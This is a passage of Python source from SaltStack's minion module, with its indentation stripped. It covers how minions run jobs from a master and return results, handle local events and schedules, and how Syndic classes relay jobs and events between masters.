if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warning(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
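# Hypothetical minion config driving _state_run() above (illustration only):
#
#     startup_states: sls
#     sls_list:
#       - edit.vim
#       - hyper
#
# With startup_states: top, top_file names the top file to use; any other
# truthy value falls through to a full state.highstate run.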
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
if hasattr(self, 'proxy'):
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify, proxy=self.proxy)
# Proxies have a chicken-and-egg problem. Usually we load grains early
# in the setup process, but we can't load grains for proxies until
# we talk to the device we are proxying for. So force a grains
# sync here.
# Hmm...We can't seem to sync grains here, makes the event bus go nuts
# leaving this commented to remind future me that this is not a good idea here.
# self.functions['saltutil.sync_grains'](saltenv='base')
else:
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Manage the minion's scheduler: add, delete, modify, enable, disable,
run, reload, list or save jobs based on the unpacked event data.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
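# Example of the unpacked event data this handler expects (hypothetical
# values, for illustration):
#
#     {'func': 'add',
#      'name': 'job1',
#      'schedule': {'job1': {'function': 'test.ping', 'seconds': 3600}},
#      'persist': True}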
def manage_beacons(self, package):
'''
Manage Beacons
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
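# Example event data for environ_setenv() (hypothetical values):
#
#     {'environ': {'FOO': 'bar', 'BAZ': False},
#      'false_unsets': True,   # with a False value, unset BAZ instead
#      'clear_all': False}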
def clean_die(self, signum, frame):
'''
Python does not handle SIGTERM cleanly; if it is signaled, exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only Windows is allowed to fail here; see #3189. Log at debug
# level in that case, else at error.
log.log(
logging.DEBUG if salt.utils.is_windows() else logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
try:
ret = channel.send(load)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('manage_beacons'):
self.manage_beacons(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception('Received master disconnect event for a master '
'this minion is not connected to')
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True)
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
self.functions, self.returners, self.function_errors = self._load_modules()
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once, otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to fire only
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype: None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
if hasattr(self, 'connected') and self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
try:
self._fire_master('ping', 'minion_ping')
except Exception:
log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
if hasattr(self, 'schedule'):
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(self._handle_payload)
else:
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
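# Example publication load checked by _target_load() (hypothetical values):
#
#     {'tgt': 'os:Ubuntu', 'tgt_type': 'grain', 'jid': '...',
#      'fun': 'test.ping', 'arg': []}
#
# Here grain_match('os:Ubuntu', delimiter=':') decides whether this minion
# runs the job; with no 'tgt_type' in the load, a plain glob match of 'tgt'
# against the minion id is used instead.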
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because the Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
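# Shape of one aggregated entry built above (hypothetical values): for a
# return event tagged 'salt/job/<jid>/ret/minion1', self.jids gains
#
#     {'__fun__': 'test.ping', '__jid__': '<jid>',
#      '__load__': {...},            # job load, fetched once per jid
#      'minion1': True}              # the minion's actual return value
#
# The '__'-prefixed keys are kept out of the master CLI output and are
# unpacked again by _return_pub() when _forward_events() flushes self.jids.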
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid],
'_syndic_return',
timeout=self._return_retry_timer())
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and
non-blocking calls (with varying timeouts along the way), this daemon does
not handle failure well: under most circumstances it will stall for ~15s
trying to forward events to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
